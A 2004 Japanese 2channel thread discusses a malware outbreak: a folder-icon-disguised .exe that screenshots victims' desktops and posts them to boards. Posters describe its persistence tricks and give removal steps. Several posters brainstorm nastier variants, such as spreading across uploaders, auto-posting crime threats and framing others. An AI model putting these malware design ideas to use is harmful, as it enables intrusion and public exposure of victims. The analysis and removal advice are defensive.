514 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 22:37:23 ID:6gk9JVQ6]: これ自体はたいしたことなさそうだが
とんでもなくエグイ亜種が出てきそうな気がする。
515 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 22:38:46 ID:0Y8OIFWt]: これ逮捕可能じゃないの？
516 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 22:39:09 ID:cHFtlyXw]: クリップボードがかわいく見えてきた
517 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 22:39:18 ID:9PF+//Fy]: 確かにkakikomi.txt晒すのが一番凶悪だな
518 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 22:39:49 ID:mrLzYwy8]: “晒す”という斬新な被害の概念を作り出したキンタマに敬意を表する。
519 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 22:42:12 ID:mrLzYwy8]: ろだが落ちたらうp先を変えたりはしないのかなぁ。

自分で新しいろだを探してうpするようにできてたら最強だけど……
520 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 22:43:36 ID:6gk9JVQ6]: ふと思ったんだがこいつを海外に流したら気づきようがないんじゃない？
521 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 22:46:26 ID:wdHMs2ep]: >>520
実害もたいして無いような
522 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 22:47:27 ID:F+6I/erB]: というか外人のを見ても面白くない
523 名前：469 mailto:sage [04/09/22 22:52:12 ID:yMfO9itd]: 本スレで、俺の書き込みのコピペがされてる模様・・・・＿|￣|○
本スレから、さらに感染拡大か(´・ω・`)ｼｮﾎﾞｰﾝ
524 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 22:53:08 ID:zasm0Yrz]: >>515
捜査協力しないと苺がやられるだろうね。
だから、結構なところまでは絞れると思う。
でも、ネカフェとかからのアップだったら、操作はそこまで。
525 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 22:53:42 ID:mrLzYwy8]: 国外にまで出るとさすがに面倒なことになる悪寒。
国内でやって欲しいな。
あーでも2ch以外でもやってくれると被害者続出して社会問題化……したりはしないか。
526 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 22:54:26 ID:6gk9JVQ6]: まぁ落ちたきたexeを実行するやつはそんなにいないでしょ
527 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 22:54:55 ID:RSK53XEO]: 最近のネカフェって監視カメラ置いてるから、仮に個室だったとしても
通路を移動する時に激写されてる悪寒。
528 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 22:56:21 ID:5TIb9wHl]: フォルダ偽装の.exeだから
踏む奴はそれなりに居る予感

つかダミースレの勢い凄いな
529 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 22:57:43 ID:zasm0Yrz]: ２ちゃんってこういうとき、該当の板って絶対止めないよな。
とくにうｐろだとか。
530 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 22:58:45 ID:iDhsW6nH]: さぁ盛り上がってまいりました（・∀・）
531 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 22:59:15 ID:cHFtlyXw]: どうせTorとか経由してうｐしてんだろ。特定不能
532 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:01:53 ID:lWXOwM8A]: 誰か今回の件まとめてくれ。
533 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:05:11 ID:aJET+JT9]: また新種かい、nyと洒落に流れてるんか
534 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:05:32 ID:VPSOXf5B]: >526
nyやってる奴ならアイコン偽装は常識だが
ｎｙやってなければ普通に引っかかると思われ
拡張子を表示してない・詳細表示もしない香具師もいっぱい居るだろうから
535 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:06:54 ID:zasm0Yrz]: >>534
Explorerのデフォルトが、表示しないようになってるからね。
536 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:07:25 ID:iDhsW6nH]: これはメル欄に回数も申告してくれるのか
537 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:09:56 ID:baZulnI6]: 逮捕可能らしいよちょっくら被害届けだしてウイルスの作者をどんな奴かみて見ようじゃないか
面白くなってきたｗ
538 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:10:58 ID:6gk9JVQ6]: >>534
うｐロダから落としたファイルでしょ？
信用のできなさはnyとそう変らんと思うがねぇ。
539 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:13:03 ID:mrLzYwy8]: こいつの応用で勝手に犯罪予告カキコとか、ある主義主張を書き込みまくるとかできそうだな。
540 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:14:32 ID:iDhsW6nH]: >>539
！！！！！！
541 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:16:31 ID:FFBqPrVy]: 犯罪予告カキコしたら作者100㌫捕まるよ
542 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:17:55 ID:zasm0Yrz]: >>541
追尾できればね。
543 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:17:56 ID:baZulnI6]: >>541
っていうか色んな所から命を狙われると思われ
今でさえヤバイかもしれんのに
544 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:17:57 ID:oAAlAMOi]: nyみたいに特定のp2pにしか流通するんじゃなくて、Web晒しともなると
アンチウイルスのベンダー各社の対応も早いと思うけど、そもそも
アンチウイルスソフト常駐させずにヤバげなの落とす香具師も多いしな～
545 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:18:03 ID:cHFtlyXw]: 被害内容：エロゲやってる所を晒されました。。。
546 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:18:52 ID:ExLnvAck]: ここ見てるやつ晒されてるな
547 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:20:22 ID:FFBqPrVy]: 現時点でもだれかが訴えれば捕まるか
548 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:20:51 ID:EQvNm7YP]: >>538
exeだがフォルダアイコンにされてるんで
平気で開く奴はいるだろう
549 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:21:03 ID:iDhsW6nH]: こいつ自身にny上での拡散機能は備わってるわけ？
ぬるぽーすは確か繁殖はしなかったからあまり流行らなかったんだよな
550 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:21:15 ID:F8v+LexZ]: 三三三三三三三　（　　　　|　　
三三三三三　　　　　)）　　　 |
三三三三)ミ,（（＾＾彡ミ彡　／　　貴様ッ！
三三三三（（三三　　6)彡/／＼
三三三∩三ﾐl三三　 /ミ彡／) |　見ているなッ！
三三三|彡ミ三ｌ三　／　＼ / /､ |
三三三ヽ＿）二 |￣　ﾉ　／　ﾐl :ｌ､＼
三　／二 /ミ　‐ｖ-― 4/　）ﾐ/ / /ヽ￣￣￣￣
三/　￣ /ﾐ　　　ｌﾐ　（_/ 三｀4｀4｀4
551 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:22:16 ID:baZulnI6]: 最初にupロダにウイルスあげた奴がnyとかのウイルス作者にも繋がってると思うよ
感染した人の誰か被害届け出したら？
552 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:22:24 ID:iDhsW6nH]: んで
作者捕まえられるってのはどうしてだい（・∀・）？
553 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:23:43 ID:cHFtlyXw]: 今頃苺のログが教徒不敬に渡っている模様
554 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:24:31 ID:VPSOXf5B]: >538
例えばろり画像うｐったとか言ってリンク貼れば
躊躇も無くフォルダアイコンクリックする奴続出でかなりの被害が出る
アンチウィルスは対応してないから
zipをスキャンかけた所で何もでなけりゃ普通にクリックしちゃうんだろうな

そもそもｎｙやってなければアイコン偽装なんて考え付かないだろう
キンタマでた当時もアイコン偽装やら　　　　　　　　　　　　　　　.ｅｘｅやらで感染者多数だったし
555 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:24:45 ID:6gk9JVQ6]: スクリーンショットをとるタイミングはランダムなの？
556 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:25:20 ID:zasm0Yrz]: 見たところ、掲示板へのメッセージポストには、
厨房板もリストに入っているんだよな。
557 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:25:36 ID:6gk9JVQ6]: >>554
なるほどね。
558 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:27:49 ID:iDhsW6nH]: maichy.s1.x-beat.com/up/data/oo5587.jpg

ヾ( ﾟ∀ﾟ)ﾉ゛ｳﾋｮｰ
漏れの書き込み写ってるよー

おまい感染してるぞm9（・∀・）ﾋﾞｼｯ!!
お気に入りさらされて恥ずかしいやつめ(　´∀｀)σ)∀`)
559 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:28:06 ID:mrLzYwy8]: 問題はろだが負荷に耐えられない点だ。
nyはそれこそP2Pだから余裕で負荷分散できてたけど、今回のは2chあぷろだに完全依存してるのかな？
560 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:29:25 ID:mrLzYwy8]: やべーﾜｸﾜｸして眠れないよ

昨日2時間しか寝てないってのに……
561 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:30:21 ID:cHFtlyXw]: >>559
バイナリ見たら依存してるっぽい。
作者はそんなに流行らない事を想定して作ったんだろう。
にしても言語がDelphiって、村長..あｑｗせｄｒｆｔｇｙふじこｌｐ
562 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:31:49 ID:l6yZ90q2]: ＞463 ：[名無し]さん(bin+cue).rar [sage] ：04/09/22 20:00:51 ID:6gk9JVQ6
＞そろそろ面白いことになるから覚悟しとけよおまいら

お前が面白いことになるかもしれないから覚悟しとけよ。
563 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:32:34 ID:aJET+JT9]: >>558 俺の書き込みも入ってる　で
　　　　誰かバスターとか先生に検体出した？　
564 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:32:34 ID:GLBs3gje]: まさか村chなんて事はありｓかｈｂしあいううぇうｈじお
565 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:33:22 ID:F2ovsLb+]: 小島さん見てる？
566 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:33:30 ID:kAgi+UO1]: 342 名前：分析師はいずこにｗ(ついでに・・・)[sage] 投稿日：04/09/22(水) 22:50:54
ラウンジの偉大な鑑定師様に感謝
etc3.2ch.net/test/read.cgi/entrance/1093784324/529
etc3.2ch.net/test/read.cgi/entrance/1095705642/738

通称：苺きんたま
形態：(写真集) (ロリータ)～みたいなフォルダ（実際にはフォルダのアイコンのexe）
症状：exeを実行するとデスクトップの画像をキャップし
　　　　２ちゃんのスレに自動的に書き込む
　　　　その他の症状は不明

修復方法：HKEY_CURRENT_USER Software\Microsoft\Windows\CurrentVersion\Run
　　　　　　　のshellsystem.exeを削除

HijackThisの04にも現れると思われるが現時点では不明
O4 - HKLM\..\Run: [？？？] C:\WINDOWS\SYSTEM\shellsystem.exe
O4 - HKLM\..\Run: [？？？] C:\WINDOWS\shellsystem.exe

注意：WindowsフォルダはOSなどでは改変する
　　　　？？？は現時点では不明

【分析】HijackThis【研究】
pc5.2ch.net/test/read.cgi/sec/1091346741/
567 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:34:07 ID:cHFtlyXw]: まさか村長、Shareにウィルス流されてからってうわなにをするやめｒｑｗせｄｒｆｔｇｙふじこｌｐ；＠
568 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:36:12 ID:mrLzYwy8]: ということで、ろだ分散が次回作への課題ですな＞作者or改良者
自分で新しいろだを見つけてくるようにできれば最高だけど。
あと感染者が多いと投稿するスレが一瞬で埋まるな。投稿先の分散も(ry

あとは節穴と書き込みログうpすれば最凶
人生終わる香具師が続出の悪寒
569 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:36:34 ID:oAAlAMOi]: Shareやってないから、村chとか村長とか言われてもわかんないよ～。
570 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:37:27 ID:6gk9JVQ6]: >>562
558はおまえのスクリーンだよって言ってるのかと思ってめっさあせったｗ
なんかほんとに面白いことになってきたね。
今夜はねれねぇや！！
571 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:37:56 ID:cHFtlyXw]: んじゃ新ウィルス名は End of life でよろ
572 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:38:27 ID:ikOHa1pk]: 別に捕まえなくても個人がそいつ訴えればいい
作者の身元判明したらもしかしたら色んな奴から訴えられるかもしれない。
感染した奴の中に「凄い恨み」を持っている奴も多数いるかもしれない
どんどんやればやるほど被害者が増えるわけで本気になるんじゃないかな
573 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:39:38 ID:0Y8OIFWt]: >>463って犯人か？
574 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:40:01 ID:cHFtlyXw]: まぁどっちにしろ、kakikomi.txtを出力しない設定にしてる俺は神って事で
575 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:40:10 ID:1LUqJ/M+]: フォルダのアイコン変えて無いやつっているのかな
576 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:40:14 ID:mrLzYwy8]: しかしこれ最強の2getウイルスだなw

殆どのダミースレで2getしてやがる
577 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:40:47 ID:L3WMITSN]: ロダに画像うｐは斬新だけど他は既存と大差ないよなぁ。
感染方法も既存ﾊﾟﾀｰﾝだから大騒ぎするほどじゃないだろ・・・。
578 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:41:32 ID:z98GE62u]: 捜査資料作成中のキャプ来ないかなあｗ
579 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:42:16 ID:iDhsW6nH]: >>577
面白いからいいんだよ

しかし俺もkakikomi.txt趣味で出力してるけど
もう止めようかなぁｗ
580 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:42:28 ID:mrLzYwy8]: >>577
問題はP2Pという閉じた環境から外に出てきてしまった事だ。
これまではnyネットワーク内で済んでたがこれからは……
581 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:42:34 ID:6gk9JVQ6]: >>573
たまたま。ちょっと煽ってみたら実現しました
582 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:43:01 ID:cHFtlyXw]: ロダに画像うｐって別に斬新じゃないと思うが・・・
583 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:44:08 ID:MmcFLfnI]: SP2スレでも書いたけど、セキュリティの最大の欠陥はユーザなんだよな。

Winが穴だらけなのは確かだが、それ以上に・・・
584 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:45:03 ID:cHFtlyXw]: qb5.2ch.net/test/read.cgi/operate/1095695740/85

なんでやたら台湾からShareしてる奴が多いんだよ
585 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:45:25 ID:6gk9JVQ6]: 本スレではもう飽きがきてるみたいだな。
586 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:46:37 ID:1LUqJ/M+]: スクショ取るだけじゃ決定的な瞬間は撮りづらいなあ
デスクトップうｐきぼんぬ
587 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:48:08 ID:cHFtlyXw]: システム稼動に必要以外のプロセスkillして、その瞬間にスクショとかあｑｗせｄｒｆｔｇｙふじこｌｐ；＠
588 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:48:19 ID:mrLzYwy8]: 画像見れないから飽きが来るんだろうな。

アプロダ落ちたらそれまで。
589 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:50:58 ID:Pp/pgXRx]: キムタマはデスクトップ上のフォルダも一緒に流したじゃん？

('A`) ﾋﾞﾐｮｰ
590 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:52:28 ID:zasm0Yrz]: Monazilla/1.00 (toolname/ver)Maropa2ch
停止しました
私は苺で違法ダウンロードばかりしている犯罪者です
shellsystem.exe　open
%d回目
大人の時間
半角二次元
アップローダ
雑談系２
厨房！

ってあたりかな。
厨房のスレッドにもやるつもりだったけどやめたのかな？
あるいは、半角板にアップローダってのが含まれるスレッドが無くなったら
厨房板の一番上のスレッドにpostするのか。
591 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:52:43 ID:1LUqJ/M+]: 本スレってどこ？
592 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:52:47 ID:mrLzYwy8]: あとアイドル的存在がいないって言うのもあるな

naoはまさに神だった……
593 名前：[名無し]さん(bin+cue).rar [04/09/22 23:52:56 ID:6gk9JVQ6]: これさぁ。ユーザー名をムカつく奴のフルネームにして。
わざと感染しエロゲー画像を流しまくったら・・・・・こ、こわ！！
594 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:53:41 ID:6gk9JVQ6]: ごめんあげてもた
595 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:54:07 ID:iDhsW6nH]: うｐろだを可能な限りウイルスに書いといて
実行時にはランダムに選ぶようにすればおｋか？
それで軽くなればjpg以外の小さなものもうｐできるようになるな
596 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:56:55 ID:Ig4m3Rvj]: 晒されたのを見て楽しむ側にお手軽感がないな
キンタマとキーワード設定するだけで寝てる間にたまるnyとは違うね
597 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:58:26 ID:mrLzYwy8]: 節穴があれば画像が見れなくても多少は楽しめたんだがなー
598 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:59:31 ID:Nw+F3dT8]: 鯖側に対策されたらすぐ終わりじゃん
P2Pの利点を全く活かしてないな
599 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:02:23 ID:IFT2b9V5]: 名前リネームするつもり駄思わずダブルクリックしちまった(笑)
>shellsystem.exe(笑)
600 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:02:49 ID:cDvdfQLH]: （笑？(汗
601 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:03:43 ID:avdWvEQz]: >>599
そのまま飼えｗ
602 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:03:45 ID:mmGHQUsE]: 俺は正直このくらいでいい。
観てるほうは面白いし晒された方はちょっと恥ずかしいけど
そんなにダメージでかくない。あとは画像が見れれば最強なんだが。
603 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:05:06 ID:qxy2PN5p]: www.zakzak.co.jp/top/
2004_09/t2004090121.html

このアドレスだけ書き込めないんだけどなぜ？
（改行してあります）
604 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:05:12 ID:uOSTlOvj]: 344 名前：分析師はいずこにｗ(ついでに・・・)[sage] 投稿日：04/09/23(木) 00:01:32
苺きんたまに感染してみたぞーーーｗ
俺が実行したのは「(写真集) (ロリータ) 水原友里.exe」だｗｗｗ
ノートン先生とBitDefenderおよびFWは全てスルーされたｗ
もちろんスパイウェア駆除製品も・・・おっとスルーだｗ
ちなみネット切断した状態で実験したから俺の画像は多分ないぞｗｗｗ

感染するとプロセスが2つ走りどちらか一つを消しても
片方を復活させる仕組みでプロセスから終了は不可

感染するとPCのデスクトップのスクリーンが取られ晒され
【うｐろだ】アップローダー案内所【アプロダ】板に以下の書き込みがされる

名前：私は苺で違法ダウンロードばかりしている犯罪者です[ここに晒るされた時の初回のID:1回目]
私は苺で違法ダウンロードばかりしている犯罪者です
【コンピュータ名】コンピュータ名が入る
【ユーザー名】ユザー名が入る(例：Owner)
【今こんな事やってます】２ちゃんロダのアドレスが晒され先が貼られる

取った処置
１：まずPCの電源を切りセーフモードで起動してファイルのC:\WINDOWS\shellsystem.exeを削除
２：元になった「(写真集) (ロリータ) 水原友里.exe」も一応削除
３：普通に再起動してHijackThisでScan以下のエントリーをFixで削除
O4 - HKLM\..\Run: [shellsystem.exe] C:\WINDOWS\shellsystem.exe

３：のHijackThisの処理で以下が消えてるのも確認できた
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
name：shellsystem.exe　data：shellsystem.exe

若干の祭り状態だからこれからの患者が予想されるｗ
とりあえずこれで解決めでたしめでたしｗｗｗ
605 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:06:10 ID:ERKjq774]: 勇者乙！
606 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:06:38 ID:cDvdfQLH]: たかがこんなウィルスでマルチプロセスにするとは。
なんか村長の気がしないでもない。
607 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:08:12 ID:cDvdfQLH]: つーかFWがスルーしたってのはただ単に設定ミス・・
608 名前：[名無し]さん(bin+cue).rar [04/09/23 00:09:20 ID:twtSBewN]: ユーザー名の変更
www.windowsfan.com/xp/tips/contents/setting/set_user03.htm
コンピュータ名の変更
www.windowsfan.com/xp/tips/contents/lan/lan_name01.htm

本名を吊るされないために
609 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:09:28 ID:mgVunU57]: >>599
デスクトップをグロ画像に汁

>>604
> 感染するとプロセスが2つ走りどちらか一つを消しても
> 片方を復活させる仕組みでプロセスから終了は不可
うをすげー。
珍しくもないのかも知れないけど、この発想はいいな。
610 名前：[名無し]さん(bin+cue).rar [04/09/23 00:09:58 ID:mmGHQUsE]: >>604
作者は力入れるとこ間違ってる気がする。
611 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:11:38 ID:avdWvEQz]: >>609
レジストリも頻繁に書き直してれば結構やばいな
612 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:13:41 ID:JkmDFIbz]: >>611
レジストリも書き直ししてるよ　猛烈な速さで
613 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:15:03 ID:62NRg8JO]: 苺キンタマか　
614 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:15:39 ID:IFT2b9V5]: マルチプロセスだね(笑)
一個殺しただけじゃ排除できない。

基本的には
１）%system%\shellsystem.exeを作成する(自己複製)
２）HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
　　にshellsystem.exeを追加
３）うｐろだのクッキーを取得し、PrintScreenしてup用のデータを作る
４）レジストリからマシン名とユーザ名を取得
５）掲示板用のデータ作成
６）指定キーワードでマッチした掲示板上のスレッドにpost

って感じみたいね。感染してみたところ(笑)
615 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:16:48 ID:q17x7W8p]: すげぇな…

ちょっと感心してしまった
616 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:18:30 ID:cDvdfQLH]: 村長…
617 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:20:28 ID:IFT2b9V5]: >>590
ちなみに、これが２ちゃんの掲示板上へpostするときの条件。
618 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:20:43 ID:+TwoeBBt]: 気合入った作りだな
ただウィルスとしては何か間違ってる気がする
619 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:24:10 ID:yEjCkAsP]: 祭り会場どこ？
参加したい
620 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:24:48 ID:iavrH4rm]: XP限定？
621 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:26:02 ID:IFT2b9V5]: 98では試してないけど、2000でも感染する。
内部的には特にOSに依存しているように見えないよ。
622 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:26:21 ID:62NRg8JO]: >>619 ここらしいよ　【うｐろだ】アップローダー案内所13【きんたま】
　　　　　　　　　　　　　idol.bbspink.com/test/read.cgi/ascii2d/1095857518/
　　　　
　　　　苺キンタ祭
623 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:26:43 ID:Omvkoikg]: >>619
idol.bbspink.com/test/read.cgi/ascii2d/1095857518/
624 名前：[名無し]さん(bin+cue).rar [04/09/23 00:26:52 ID:8EfG+J1e]: jpgもﾔｳﾞｧｲらしいぞ!!!!
625 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:27:05 ID:IFT2b9V5]: でも、プロセス殺せないって言い過ぎだね、祭りスレ。
プロセスツリーを殺せば両方死ぬよ。
626 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:28:03 ID:yEjCkAsP]: >>622,623
thx
627 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:29:09 ID:Q+leSqll]: >>563
ノートン先生には出しておいた。
628 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:29:14 ID:neSmPO5T]: 晒されたjpg見てたら、ﾒｰﾗが勝手に起動したぞ、ｵｲ
629 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:29:36 ID:mmGHQUsE]: おいおまいら関祭りには参加しなかったのか？
630 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:31:11 ID:zW53Q5jb]: >>629
してるよ。チャットだろ
631 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:32:10 ID:XTKk22G2]: >>630
お前可愛いな
632 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:33:53 ID:WmXl7kiF]: 原口祭りの次は関祭りか
633 名前：[名無し]さん(bin+cue).rar [04/09/23 00:35:56 ID:IE8I1c5s]: 原口とか関って誰？
634 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:35:59 ID:mmGHQUsE]: tesu
635 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:39:25 ID:sH8yfJe2]: セーフモードで起動しなくても駆除できるよ。
使うものはコマンドプロンプトとレジストリエディタ。

1. 感染したらまず、コマンドプロンプトを開いてtasklistを実行
2. その中に以下のいずれかのファイル名があることを確認

(写真集) (ロリータ) 水原友里.exe
(写真集) (ロリータ) 相田香奈子.exe
コピー～ (写真集) (ロリータ) 河瀬菜美.exe
shellsystem.exe

3. あるのを確認したら下記のコマンドを入力
　taskkill /f /im "ウイルスのファイル名" /t

4. 「成功」と出たら次は下記ウイルスファイルの削除を行う
　%SystemRoot%\shellsystem.exe
　解凍先にあるウイルスファイル

5. 削除が完了したらレジストリエディタ（regedit）を開いて
HKEY_USER\.Default\Software\Microsoft\Windows\CurrentVersion\Run
shellsystem.exe :='C:\Windows\shellsystem.exe'
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
shellsystem.exe :='C:\Windows\shellsystem.exe'
を削除する

以上で完了かな。
636 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:39:27 ID:EpVCAi7y]: 感染能力ないんだろ？
637 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:39:46 ID:mmGHQUsE]: てす
638 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:41:09 ID:62NRg8JO]: >>627 ID変わってるけど㌧くす
　　　　SS見たいのは山々だけど、ろだが重くて見れんよ(´･ω･`)ｼｮﾎﾞｰﾝ
　　　　というかつい最近あった脆弱性を突いて、晒されたjpgを見ただけで感染したら
　　　　恐ろしいかも　もともと感染しちゃった人は偽装exeを知らなかったんだね…
639 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:42:44 ID:mmGHQUsE]: ニュー速で規制されたorz
９０秒ってなげーよ・・・
640 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:43:48 ID:Xufqlvin]: えーと、nyはPCに入れてないんですが、感染してしまいました。
上で書かれた方法で徹底的に除去しましたが、再インストールの必要性はありますか？
641 名前：感染でパニクってる者達へ mailto:sage [04/09/23 00:44:13 ID:ERKjq774]: 以上
tmp4.2ch.net/test/read.cgi/download/1094872215/
の
>>635
さんの書き込みです

成功したら彼に感謝を
642 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:44:36 ID:avdWvEQz]: >>640
人生を再インストー（ｒｙ
643 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:45:00 ID:Rr2p3mqe]: キンタマのやつ、システムの復元やったらウィンドゥズのトコにあったファイル消えたけど
これで大丈夫？
644 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:45:19 ID:IFT2b9V5]: vbsあたりで除去パッチ簡単に作れそうだね。
645 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:46:08 ID:Xufqlvin]: >>642
なるほど、いっそこの際元から断つ(絶つ)、と。
人生のアドバイスありがとうございます。
646 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:46:11 ID:IE8I1c5s]: >>643
ドゥイジョウブドゥス
647 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:46:36 ID:R1XdgUSO]: こどもホタル祭りﾜﾛﾀ
648 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:47:05 ID:Rr2p3mqe]: >>646
サンクス
649 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:49:23 ID:4MBKm6hw]: USBｶﾒﾗでｽｸﾘｰﾝｼｮｯﾄ機能はどうした?
650 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:49:45 ID:o5J4yEHm]: >647
なにそれ？
651 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:53:55 ID:ZTCe7RBf]: >>635
tasklistってXPhomeだとなに？
